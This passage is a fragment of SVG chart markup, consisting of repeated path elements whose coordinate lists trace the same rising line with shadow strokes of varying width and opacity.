16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.77434666666662 L 58.92095588235295 236.77434666666662 L 60.44898897058824 236.77434666666662 L 61.977022058823536 236.77434666666662 L 63.505055147058826 236.77434666666662 L 65.03308823529412 236.77434666666662 L 66.56112132352942 236.77434666666662 L 68.08915441176471 236.77434666666662 L 69.6171875 236.77434666666662 L 71.1452205882353 236.77434666666662 L 72.6732536764706 236.77434666666662 L 74.20128676470588 236.77434666666662 L 75.72931985294119 236.77434666666662 L 77.25735294117648 236.77434666666662 L 78.78538602941177 236.77434666666662 L 80.31341911764706 236.77434666666662 L 81.84145220588236 236.77434666666662 L 83.36948529411765 236.77434666666662 L 84.89751838235294 236.77434666666662 L 86.42555147058825 236.77434666666662 L 87.95358455882354 236.77434666666662 L 89.48161764705883 236.77434666666662 L 91.00965073529413 236.77434666666662 L 92.53768382352942 236.77434666666662 L 94.06571691176471 236.77434666666662 L 95.59375 236.77434666666662 L 97.1217830882353 236.77434666666662 L 98.6498161764706 236.77434666666662 L 100.17784926470588 236.77434666666662 L 101.70588235294119 236.77434666666662 L 103.23391544117648 236.77434666666662 L 104.76194852941177 236.77434666666662 L 106.28998161764706 236.77434666666662 L 107.81801470588236 236.77434666666662 L 109.34604779411765 236.77434666666662 L 110.87408088235294 236.77434666666662 L 112.40211397058825 236.77434666666662 L 113.93014705882354 236.77434666666662 L 115.45818014705883 236.77434666666662 L 116.98621323529413 236.77434666666662 L 118.51424632352942 236.62267626666662 L 120.04227941176471 236.62267626666662 L 121.5703125 236.62267626666662 L 123.0983455882353 236.62267626666662 L 124.6263786764706 236.62267626666662 L 126.15441176470588 236.62267626666662 L 127.68244485294119 236.62267626666662 L 129.21047794117646 236.62267626666662 L 130.73851102941177 236.62267626666662 L 132.26654411764707 236.62267626666662 L 133.79457720588235 236.62267626666662 L 135.32261029411765 236.62267626666662 L 136.85064338235296 236.62267626666662 L 138.37867647058823 236.62267626666662 L 139.90670955882354 236.62267626666662 L 141.43474264705884 236.62267626666662 L 142.96277573529412 236.62267626666662 L 144.49080882352942 236.62267626666662 L 146.01884191176472 236.62267626666662 L 147.546875 236.62267626666662 L 149.0749080882353 236.62267626666662 L 150.6029411764706 236.62267626666662 L 152.13097426470588 236.62267626666662 L 153.6590073529412 236.62267626666662 L 155.18704044117646 236.62267626666662 L 156.71507352941177 236.62267626666662 L 158.24310661764707 236.62267626666662 L 159.77113970588235 236.53867146666664 L 161.29917279411765 236.501202208 L 162.82720588235296 236.47307036799998 L 164.35523897058823 236.47307036799998 L 165.88327205882354 236.296322848 L 167.41130514705884 235.330569568 L 168.93933823529412 234.542878048 L 170.46737132352942 232.607322208 L 171.99540441176472 223.29735260799998 L 173.5234375 214.328197408 L 175.0514705882353 207.661803808 L 176.5795036764706 201.162709408 L 178.10753676470588 196.42505180799998 L 179.6355698529412 190.607763808 L 181.1636029411765 183.028861408 L 182.69163602941177 178.910672608 L 184.21966911764707 177.936799456 L 185.74770220588235 177.936799456 L 187.27573529411765 177.89718834133325 L 188.80376838235296 177.23994994133324 L 190.33180147058823 177.23994994133324 L 191.85983455882354 176.7622087040001 L 193.38786764705884 176.659486048 L 194.91590073529412 175.380659488 L 196.44393382352942 175.05897852799976 L 197.97196691176472 175.05897852799976 L 199.5 175.05897852799976 L 201.0280330882353 175.05897852799976 L 202.5560661764706 174.9770986133331 L 204.08409926470588 174.32841106133316 L 205.6121323529412 173.80979774933314 L 207.1401654411765 173.67152075733324 L 208.66819852941177 173.67152075733324 L 210.19623161764707 173.67152075733324 L 211.72426470588235 173.67152075733324 L 213.25229779411765 173.67152075733324 L 214.78033088235296 173.67152075733324 L 216.30836397058823 173.67152075733324 L 217.83639705882354 173.67152075733324 L 219.36443014705884 173.67152075733324 L 220.89246323529412 173.67152075733324 L 222.42049632352942 173.67152075733324 L 223.94852941176472 173.67152075733324 L 225.4765625 173.67152075733324 L 227.0045955882353 173.65162955733325 L 228.5326286764706 172.40985035733326 L 230.06066176470588 172.00701803733327 L 231.5886948529412 170.01679691733327 L 233.1167279411765 168.07651691733327 L 234.64476102941177 165.57883931733326 L 236.17279411764707 164.35862628266688 L 237.70082720588238 163.47452953599964 L 239.22886029411765 161.62198393599965 L 240.75689338235296 159.92814169599964 L 242.28492647058823 158.88675567999965 L 243.81295955882354 157.720821941333 L 245.34099264705884 157.720821941333 L 246.86902573529412 157.720821941333 L 248.39705882352942 157.720821941333 L 249.92509191176472 157.720821941333 L 251.453125 157.720821941333 L 252.9811580882353 157.720821941333 L 254.5091911764706 156.32247058133302 L 256.0372242647059 154.99228210133302 L 257.56525735294116 153.73583314133302 L 259.09329044117646 153.09221074133302 L 260.62132352941177 152.45501035733304 L 262.1493566176471 151.87572414933265 L 263.6773897058824 151.4342807999993 L 265.2054227941177 150.8807781653328 L 266.7334558823529 150.18465128533276 L 268.26148897058823 149.84793194666614 L 269.78952205882354 149.03587370666614 L 271.31755514705884 148.31781322666652 L 272.84558823529414 148.00865385599982 L 274.37362132352945 147.8584705599998 L 275.9016544117647 147.56978925866633 L 277.4296875 147.35941140266632 L 278.9577205882353 147.0931298026663 L 280.4857536764706 146.81150750933327 L 282.0137867647059 146.62345831466655 L 283.54181985294116 146.45029831466655 L 285.06985294117646 146.42543431466655 L 286.59788602941177 146.42543431466655 L 288.1259191176471 146.42543431466655 L 289.6539522058824 146.42543431466655 L 291.1819852941177 146.42543431466655 L 292.7100183823529 146.42543431466655 L 294.23805147058823 146.42543431466655 L 295.76608455882354 146.42543431466655 L 297.29411764705884 146.42543431466655 L 298.82215073529414 146.42543431466655 L 300.35018382352945 146.42543431466655 L 301.8782169117647 146.42543431466655 L 303.40625 146.42543431466655 L 304.9342830882353 146.3963473813333 L 306.4623161764706 146.3963473813333 L 307.9903492647059 146.3963473813333 L 309.51838235294116 146.3963473813333 L 311.04641544117646 146.3963473813333 L 312.57444852941177 146.3963473813333 L 314.1024816176471 146.3963473813333 L 315.6305147058824 146.3963473813333 L 317.1585477941177 146.3963473813333 L 318.6865808823529 146.3905292053333 L 320.21461397058823 146.3905292053333 L 321.74264705882354 146.3905292053333 L 323.27068014705884 146.3905292053333 L 324.79871323529414 146.3905292053333 L 326.32674632352945 146.3905292053333 L 327.8547794117647 146.3905292053333 L 329.3828125 146.3905292053333 L 330.9108455882353 146.3905292053333 L 332.4388786764706 146.3905292053333 L 333.9669117647059 146.3905292053333 L 335.4949448529412 146.3905292053333 L 337.02297794117646 146.3905292053333 L 338.55101102941177 146.3905292053333 L 340.0790441176471 146.3905292053333 L 341.6070772058824 146.3905292053333 L 343.1351102941177 146.3905292053333 L 344.6631433823529 146.3905292053333 L 346.19117647058823 146.3905292053333 L 347.71920955882354 146.3905292053333 L 349.24724264705884 146.34364280533327 L 350.77527573529414 145.8179112853333 L 352.30330882352945 145.2620943253333 L 353.8313419117647 144.8875892053333 L 355.359375 144.3563149866667 L 356.8874080882353 144.1452760639999 L 358.4154411764706 143.66090166399988 L 359.9434742647059 143.5343794239999 L 361.4715073529412 143.32381686399987 L 362.99954044117646 142.67912886399986 L 364.52757352941177 142.22990387199988 L 366.0556066176471 141.66738705066638 L 367.5836397058824 140.2285630186664 L 369.1116727941177 138.73015181866637 L 370.6397058823529 137.82415501866637 L 372.16773897058823 136.16395021866634 L 373.69577205882354 133.70063821866637 L 375.22380514705884 131.54912077866635 L 376.75183823529414 130.62727021866638 L 378.27987132352945 129.24230989866638 L 379.8079044117647 128.87701156266638 L 381.3359375 128.87701156266638 L 382.8639705882353 128.87701156266638 L 384.3920036764706 128.87701156266638 L 385.9200367647059 128.63470596266635 L 387.4480698529412 128.24192580266637 L 388.97610294117646 127.82218596266637 L 390.50413602941177 127.66921908266636 L 392.0321691176471 127.53481613866634 L 393.5602022058824 127.16046730666633 L 395.0882352941177 127.08597002666636" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.77434666666662 L 58.92095588235295 236.77434666666662 L 60.44898897058824 236.77434666666662 L 61.977022058823536 236.77434666666662 L 63.505055147058826 236.77434666666662 L 65.03308823529412 236.77434666666662 L 66.56112132352942 236.77434666666662 L 68.08915441176471 236.77434666666662 L 69.6171875 236.77434666666662 L 71.1452205882353 236.77434666666662 L 72.6732536764706 236.77434666666662 L 74.20128676470588 236.77434666666662 L 75.72931985294119 236.77434666666662 L 77.25735294117648 236.77434666666662 L 78.78538602941177 236.77434666666662 L 80.31341911764706 236.77434666666662 L 81.84145220588236 236.77434666666662 L 83.36948529411765 236.77434666666662 L 84.89751838235294 236.77434666666662 L 86.42555147058825 236.77434666666662 L 87.95358455882354 236.77434666666662 L 89.48161764705883 236.77434666666662 L 91.00965073529413 236.77434666666662 L 92.53768382352942 236.77434666666662 L 94.06571691176471 236.77434666666662 L 95.59375 236.77434666666662 L 97.1217830882353 236.77434666666662 L 98.6498161764706 236.77434666666662 L 100.17784926470588 236.77434666666662 L 101.70588235294119 236.77434666666662 L 103.23391544117648 236.77434666666662 L 104.76194852941177 236.77434666666662 L 106.28998161764706 236.77434666666662 L 107.81801470588236 236.77434666666662 L 109.34604779411765 236.77434666666662 L 110.87408088235294 236.77434666666662 L 112.40211397058825 236.77434666666662 L 113.93014705882354 236.77434666666662 L 115.45818014705883 236.77434666666662 L 116.98621323529413 236.77434666666662 L 118.51424632352942 236.62267626666662 L 120.04227941176471 236.62267626666662 L 121.5703125 236.62267626666662 L 123.0983455882353 236.62267626666662 L 124.6263786764706 236.62267626666662 L 126.15441176470588 236.62267626666662 L 127.68244485294119 236.62267626666662 L 129.21047794117646 236.62267626666662 L 130.73851102941177 236.62267626666662 L 132.26654411764707 236.62267626666662 L 133.79457720588235 236.62267626666662 L 135.32261029411765 236.62267626666662 L 136.85064338235296 236.62267626666662 L 138.37867647058823 236.62267626666662 L 139.90670955882354 236.62267626666662 L 141.43474264705884 236.62267626666662 L 142.96277573529412 236.62267626666662 L 144.49080882352942 236.62267626666662 L 146.01884191176472 236.62267626666662 L 147.546875 236.62267626666662 L 149.0749080882353 236.62267626666662 L 150.6029411764706 236.62267626666662 L 152.13097426470588 236.62267626666662 L 153.6590073529412 236.62267626666662 L 155.18704044117646 236.62267626666662 L 156.71507352941177 236.62267626666662 L 158.24310661764707 236.62267626666662 L 159.77113970588235 236.53867146666664 L 161.29917279411765 236.501202208 L 162.82720588235296 236.47307036799998 L 164.35523897058823 236.47307036799998 L 165.88327205882354 236.296322848 L 167.41130514705884 235.330569568 L 168.93933823529412 234.542878048 L 170.46737132352942 232.607322208 L 171.99540441176472 223.29735260799998 L 173.5234375 214.328197408 L 175.0514705882353 207.661803808 L 176.5795036764706 201.162709408 L 178.10753676470588 196.42505180799998 L 179.6355698529412 190.607763808 L 181.1636029411765 183.028861408 L 182.69163602941177 178.910672608 L 184.21966911764707 177.936799456 L 185.74770220588235 177.936799456 L 187.27573529411765 177.89718834133325 L 188.80376838235296 177.23994994133324 L 190.33180147058823 177.23994994133324 L 191.85983455882354 176.7622087040001 L 193.38786764705884 176.659486048 L 194.91590073529412 175.380659488 L 196.44393382352942 175.05897852799976 L 197.97196691176472 175.05897852799976 L 199.5 175.05897852799976 L 201.0280330882353 175.05897852799976 L 202.5560661764706 174.9770986133331 L 204.08409926470588 174.32841106133316 L 205.6121323529412 173.80979774933314 L 207.1401654411765 173.67152075733324 L 208.66819852941177 173.67152075733324 L 210.19623161764707 173.67152075733324 L 211.72426470588235 173.67152075733324 L 213.25229779411765 173.67152075733324 L 214.78033088235296 173.67152075733324 L 216.30836397058823 173.67152075733324 L 217.83639705882354 173.67152075733324 L 219.36443014705884 173.67152075733324 L 220.89246323529412 173.67152075733324 L 222.42049632352942 173.67152075733324 L 223.94852941176472 173.67152075733324 L 225.4765625 173.67152075733324 L 227.0045955882353 173.65162955733325 L 228.5326286764706 172.40985035733326 L 230.06066176470588 172.00701803733327 L 231.5886948529412 170.01679691733327 L 233.1167279411765 168.07651691733327 L 234.64476102941177 165.57883931733326 L 236.17279411764707 164.35862628266688 L 237.70082720588238 163.47452953599964 L 239.22886029411765 161.62198393599965 L 240.75689338235296 159.92814169599964 L 242.28492647058823 158.88675567999965 L 243.81295955882354 157.720821941333 L 245.34099264705884 157.720821941333 L 246.86902573529412 157.720821941333 L 248.39705882352942 157.720821941333 L 249.92509191176472 157.720821941333 L 251.453125 157.720821941333 L 252.9811580882353 157.720821941333 L 254.5091911764706 156.32247058133302 L 256.0372242647059 154.99228210133302 L 257.56525735294116 153.73583314133302 L 259.09329044117646 153.09221074133302 L 260.62132352941177 152.45501035733304 L 262.1493566176471 151.87572414933265 L 263.6773897058824 151.4342807999993 L 265.2054227941177 150.8807781653328 L 266.7334558823529 150.18465128533276 L 268.26148897058823 149.84793194666614 L 269.78952205882354 149.03587370666614 L 271.31755514705884 148.31781322666652 L 272.84558823529414 148.00865385599982 L 274.37362132352945 147.8584705599998 L 275.9016544117647 147.56978925866633 L 277.4296875 147.35941140266632 L 278.9577205882353 147.0931298026663 L 280.4857536764706 146.81150750933327 L 282.0137867647059 146.62345831466655 L 283.54181985294116 146.45029831466655 L 285.06985294117646 146.42543431466655 L 286.59788602941177 146.42543431466655 L 288.1259191176471 146.42543431466655 L 289.6539522058824 146.42543431466655 L 291.1819852941177 146.42543431466655 L 292.7100183823529 146.42543431466655 L 294.23805147058823 146.42543431466655 L 295.76608455882354 146.42543431466655 L 297.29411764705884 146.42543431466655 L 298.82215073529414 146.42543431466655 L 300.35018382352945 146.42543431466655 L 301.8782169117647 146.42543431466655 L 303.40625 146.42543431466655 L 304.9342830882353 146.3963473813333 L 306.4623161764706 146.3963473813333 L 307.9903492647059 146.3963473813333 L 309.51838235294116 146.3963473813333 L 311.04641544117646 146.3963473813333 L 312.57444852941177 146.3963473813333 L 314.1024816176471 146.3963473813333 L 315.6305147058824 146.3963473813333 L 317.1585477941177 146.3963473813333 L 318.6865808823529 146.3905292053333 L 320.21461397058823 146.3905292053333 L 321.74264705882354 146.3905292053333 L 323.27068014705884 146.3905292053333 L 324.79871323529414 146.3905292053333 L 326.32674632352945 146.3905292053333 L 327.8547794117647 146.3905292053333 L 329.3828125 146.3905292053333 L 330.9108455882353 146.3905292053333 L 332.4388786764706 146.3905292053333 L 333.9669117647059 146.3905292053333 L 335.4949448529412 146.3905292053333 L 337.02297794117646 146.3905292053333 L 338.55101102941177 146.3905292053333 L 340.0790441176471 146.3905292053333 L 341.6070772058824 146.3905292053333 L 343.1351102941177 146.3905292053333 L 344.6631433823529 146.3905292053333 L 346.19117647058823 146.3905292053333 L 347.71920955882354 146.3905292053333 L 349.24724264705884 146.34364280533327 L 350.77527573529414 145.8179112853333 L 352.30330882352945 145.2620943253333 L 353.8313419117647 144.8875892053333 L 355.359375 144.3563149866667 L 356.8874080882353 144.1452760639999 L 358.4154411764706 143.66090166399988 L 359.9434742647059 143.5343794239999 L 361.4715073529412 143.32381686399987 L 362.99954044117646 142.67912886399986 L 364.52757352941177 142.22990387199988 L 366.0556066176471 141.66738705066638 L 367.5836397058824 140.2285630186664 L 369.1116727941177 138.73015181866637 L 370.6397058823529 137.82415501866637 L 372.16773897058823 136.16395021866634 L 373.69577205882354 133.70063821866637 L 375.22380514705884 131.54912077866635 L 376.75183823529414 130.62727021866638 L 378.27987132352945 129.24230989866638 L 379.8079044117647 128.87701156266638 L 381.3359375 128.87701156266638 L 382.8639705882353 128.87701156266638 L 384.3920036764706 128.87701156266638 L 385.9200367647059 128.63470596266635 L 387.4480698529412 128.24192580266637 L 388.97610294117646 127.82218596266637 L 390.50413602941177 127.66921908266636 L 392.0321691176471 127.53481613866634 L 393.5602022058824 127.16046730666633 L 395.0882352941177 127.08597002666636" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.77434666666662 L 58.92095588235295 236.77434666666662 L 60.44898897058824 236.77434666666662 L 61.977022058823536 236.77434666666662 L 63.505055147058826 236.77434666666662 L 65.03308823529412 236.77434666666662 L 66.56112132352942 236.77434666666662 L 68.08915441176471 236.77434666666662 L 69.6171875 236.77434666666662 L 71.1452205882353 236.77434666666662 L 72.6732536764706 236.77434666666662 L 74.20128676470588 236.77434666666662 L 75.72931985294119 236.77434666666662 L 77.25735294117648 236.77434666666662 L 78.78538602941177 236.77434666666662 L 80.31341911764706 236.77434666666662 L 81.84145220588236 236.77434666666662 L 83.36948529411765 236.77434666666662 L 84.89751838235294 236.77434666666662 L 86.42555147058825 236.77434666666662 L 87.95358455882354 236.77434666666662 L 89.48161764705883 236.77434666666662 L 91.00965073529413 236.77434666666662 L 92.53768382352942 236.77434666666662 L 94.06571691176471 236.77434666666662 L 95.59375 236.77434666666662 L 97.1217830882353 236.77434666666662 L 98.6498161764706 236.77434666666662 L 100.17784926470588 236.77434666666662 L 101.70588235294119 236.77434666666662 L 103.23391544117648 236.77434666666662 L 104.76194852941177 236.77434666666662 L 106.28998161764706 236.77434666666662 L 107.81801470588236 236.77434666666662 L 109.34604779411765 236.77434666666662 L 110.87408088235294 236.77434666666662 L 112.40211397058825 236.77434666666662 L 113.93014705882354 236.77434666666662 L 115.45818014705883 236.77434666666662 L 116.98621323529413 236.77434666666662 L 118.51424632352942 236.62267626666662 L 120.04227941176471 236.62267626666662 L 121.5703125 236.62267626666662 L 123.0983455882353 236.62267626666662 L 124.6263786764706 236.62267626666662 L 126.15441176470588 236.62267626666662 L 127.68244485294119 236.62267626666662 L 129.21047794117646 236.62267626666662 L 130.73851102941177 236.62267626666662 L 132.26654411764707 236.62267626666662 L 133.79457720588235 236.62267626666662 L 135.32261029411765 236.62267626666662 L 136.85064338235296 236.62267626666662 L 138.37867647058823 236.62267626666662 L 139.90670955882354 236.62267626666662 L 141.43474264705884 236.62267626666662 L 142.96277573529412 236.62267626666662 L 144.49080882352942 236.62267626666662 L 146.01884191176472 236.62267626666662 L 147.546875 236.62267626666662 L 149.0749080882353 236.62267626666662 L 150.6029411764706 236.62267626666662 L 152.13097426470588 236.62267626666662 L 153.6590073529412 236.62267626666662 L 155.18704044117646 236.62267626666662 L 156.71507352941177 236.62267626666662 L 158.24310661764707 236.62267626666662 L 159.77113970588235 236.53867146666664 L 161.29917279411765 236.501202208 L 162.82720588235296 236.47307036799998 L 164.35523897058823 236.47307036799998 L 165.88327205882354 236.296322848 L 167.41130514705884 235.330569568 L 168.93933823529412 234.542878048 L 170.46737132352942 232.607322208 L 171.99540441176472 223.29735260799998 L 173.5234375 214.328197408 L 175.0514705882353 207.661803808 L 176.5795036764706 201.162709408 L 178.10753676470588 196.42505180799998 L 179.6355698529412 190.607763808 L 181.1636029411765 183.028861408 L 182.69163602941177 178.910672608 L 184.21966911764707 177.936799456 L 185.74770220588235 177.936799456 L 187.27573529411765 177.89718834133325 L 188.80376838235296 177.23994994133324 L 190.33180147058823 177.23994994133324 L 191.85983455882354 176.7622087040001 L 193.38786764705884 176.659486048 L 194.91590073529412 175.380659488 L 196.44393382352942 175.05897852799976 L 197.97196691176472 175.05897852799976 L 199.5 175.05897852799976 L 201.0280330882353 175.05897852799976 L 202.5560661764706 174.9770986133331 L 204.08409926470588 174.32841106133316 L 205.6121323529412 173.80979774933314 L 207.1401654411765 173.67152075733324 L 208.66819852941177 173.67152075733324 L 210.19623161764707 173.67152075733324 L 211.72426470588235 173.67152075733324 L 213.25229779411765 173.67152075733324 L 214.78033088235296 173.67152075733324 L 216.30836397058823 173.67152075733324 L 217.83639705882354 173.67152075733324 L 219.36443014705884 173.67152075733324 L 220.89246323529412 173.67152075733324 L 222.42049632352942 173.67152075733324 L 223.94852941176472 173.67152075733324 L 225.4765625 173.67152075733324 L 227.0045955882353 173.65162955733325 L 228.5326286764706 172.40985035733326 L 230.06066176470588 172.00701803733327 L 231.5886948529412 170.01679691733327 L 233.1167279411765 168.07651691733327 L 234.64476102941177 165.57883931733326 L 236.17279411764707 164.35862628266688 L 237.70082720588238 163.47452953599964 L 239.22886029411765 161.62198393599965 L 240.75689338235296 159.92814169599964 L 242.28492647058823 158.88675567999965 L 243.81295955882354 157.720821941333 L 245.34099264705884 157.720821941333 L 246.86902573529412 157.720821941333 L 248.39705882352942 157.720821941333 L 249.92509191176472 157.720821941333 L 251.453125 157.720821941333 L 252.9811580882353 157.720821941333 L 254.5091911764706 156.32247058133302 L 256.0372242647059 154.99228210133302 L 257.56525735294116 153.73583314133302 L 259.09329044117646 153.09221074133302 L 260.62132352941177 152.45501035733304 L 262.1493566176471 151.87572414933265 L 263.6773897058824 151.4342807999993 L 265.2054227941177 150.8807781653328 L 266.7334558823529 150.18465128533276 L 268.26148897058823 149.84793194666614 L 269.78952205882354 149.03587370666614 L 271.31755514705884 148.31781322666652 L 272.84558823529414 148.00865385599982 L 274.37362132352945 147.8584705599998 L 275.9016544117647 147.56978925866633 L 277.4296875 147.35941140266632 L 278.9577205882353 147.0931298026663 L 280.4857536764706 146.81150750933327 L 282.0137867647059 146.62345831466655 L 283.54181985294116 146.45029831466655 L 285.06985294117646 146.42543431466655 L 286.59788602941177 146.42543431466655 L 288.1259191176471 146.42543431466655 L 289.6539522058824 146.42543431466655 L 291.1819852941177 146.42543431466655 L 292.7100183823529 146.42543431466655 L 294.23805147058823 146.42543431466655 L 295.76608455882354 146.42543431466655 L 297.29411764705884 146.42543431466655 L 298.82215073529414 146.42543431466655 L 300.35018382352945 146.42543431466655 L 301.8782169117647 146.42543431466655 L 303.40625 146.42543431466655 L 304.9342830882353 146.3963473813333 L 306.4623161764706 146.3963473813333 L 307.9903492647059 146.3963473813333 L 309.51838235294116 146.3963473813333 L 311.04641544117646 146.3963473813333 L 312.57444852941177 146.3963473813333 L 314.1024816176471 146.3963473813333 L 315.6305147058824 146.3963473813333 L 317.1585477941177 146.3963473813333 L 318.6865808823529 146.3905292053333 L 320.21461397058823 146.3905292053333 L 321.74264705882354 146.3905292053333 L 323.27068014705884 146.3905292053333 L 324.79871323529414 146.3905292053333 L 326.32674632352945 146.3905292053333 L 327.8547794117647 146.3905292053333 L 329.3828125 146.3905292053333 L 330.9108455882353 146.3905292053333 L 332.4388786764706 146.3905292053333 L 333.9669117647059 146.3905292053333 L 335.4949448529412 146.3905292053333 L 337.02297794117646 146.3905292053333 L 338.55101102941177 146.3905292053333 L 340.0790441176471 146.3905292053333 L 341.6070772058824 146.3905292053333 L 343.1351102941177 146.3905292053333 L 344.6631433823529 146.3905292053333 L 346.19117647058823 146.3905292053333 L 347.71920955882354 146.3905292053333 L 349.24724264705884 146.34364280533327 L 350.77527573529414 145.8179112853333 L 352.30330882352945 145.2620943253333 L 353.8313419117647 144.8875892053333 L 355.359375 144.3563149866667 L 356.8874080882353 144.1452760639999 L 358.4154411764706 143.66090166399988 L 359.9434742647059 143.5343794239999 L 361.4715073529412 143.32381686399987 L 362.99954044117646 142.67912886399986 L 364.52757352941177 142.22990387199988 L 366.0556066176471 141.66738705066638 L 367.5836397058824 140.2285630186664 L 369.1116727941177 138.73015181866637 L 370.6397058823529 137.82415501866637 L 372.16773897058823 136.16395021866634 L 373.69577205882354 133.70063821866637 L 375.22380514705884 131.54912077866635 L 376.75183823529414 130.62727021866638 L 378.27987132352945 129.24230989866638 L 379.8079044117647 128.87701156266638 L 381.3359375 128.87701156266638 L 382.8639705882353 128.87701156266638 L 384.3920036764706 128.87701156266638 L 385.9200367647059 128.63470596266635 L 387.4480698529412 128.24192580266637 L 388.97610294117646 127.82218596266637 L 390.50413602941177 127.66921908266636 L 392.0321691176471 127.53481613866634 L 393.5602022058824 127.16046730666633 L 395.0882352941177 127.08597002666636" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.77434666666662 L 58.92095588235295 236.77434666666662 L 60.44898897058824 236.77434666666662 L 61.977022058823536 236.77434666666662 L 63.505055147058826 236.77434666666662 L 65.03308823529412 236.77434666666662 L 66.56112132352942 236.77434666666662 L 68.08915441176471 236.77434666666662 L 69.6171875 236.77434666666662 L 71.1452205882353 236.77434666666662 L 72.6732536764706 236.77434666666662 L 74.20128676470588 236.77434666666662 L 75.72931985294119 236.77434666666662 L 77.25735294117648 236.77434666666662 L 78.78538602941177 236.77434666666662 L 80.31341911764706 236.77434666666662 L 81.84145220588236 236.77434666666662 L 83.36948529411765 236.77434666666662 L 84.89751838235294 236.77434666666662 L 86.42555147058825 236.77434666666662 L 87.95358455882354 236.77434666666662 L 89.48161764705883 236.77434666666662 L 91.00965073529413 236.77434666666662 L 92.53768382352942 236.77434666666662 L 94.06571691176471 236.77434666666662 L 95.59375 236.77434666666662 L 97.1217830882353 236.77434666666662 L 98.6498161764706 236.77434666666662 L 100.17784926470588 236.77434666666662 L 101.70588235294119 236.77434666666662 L 103.23391544117648 236.77434666666662 L 104.76194852941177 236.77434666666662 L 106.28998161764706 236.77434666666662 L 107.81801470588236 236.77434666666662 L 109.34604779411765 236.77434666666662 L 110.87408088235294 236.77434666666662 L 112.40211397058825 236.77434666666662 L 113.93014705882354 236.77434666666662 L 115.45818014705883 236.77434666666662 L 116.98621323529413 236.77434666666662 L 118.51424632352942 236.62267626666662 L 120.04227941176471 236.62267626666662 L 121.5703125 236.62267626666662 L 123.0983455882353 236.62267626666662 L 124.6263786764706 236.62267626666662 L 126.15441176470588 236.62267626666662 L 127.68244485294119 236.62267626666662 L 129.21047794117646 236.62267626666662 L 130.73851102941177 236.62267626666662 L 132.26654411764707 236.62267626666662 L 133.79457720588235 236.62267626666662 L 135.32261029411765 236.62267626666662 L 136.85064338235296 236.62267626666662 L 138.37867647058823 236.62267626666662 L 139.90670955882354 236.62267626666662 L 141.43474264705884 236.62267626666662 L 142.96277573529412 236.62267626666662 L 144.49080882352942 236.62267626666662 L 146.01884191176472 236.62267626666662 L 147.546875 236.62267626666662 L 149.0749080882353 236.62267626666662 L 150.6029411764706 236.62267626666662 L 152.13097426470588 236.62267626666662 L 153.6590073529412 236.62267626666662 L 155.18704044117646 236.62267626666662 L 156.71507352941177 236.62267626666662 L 158.24310661764707 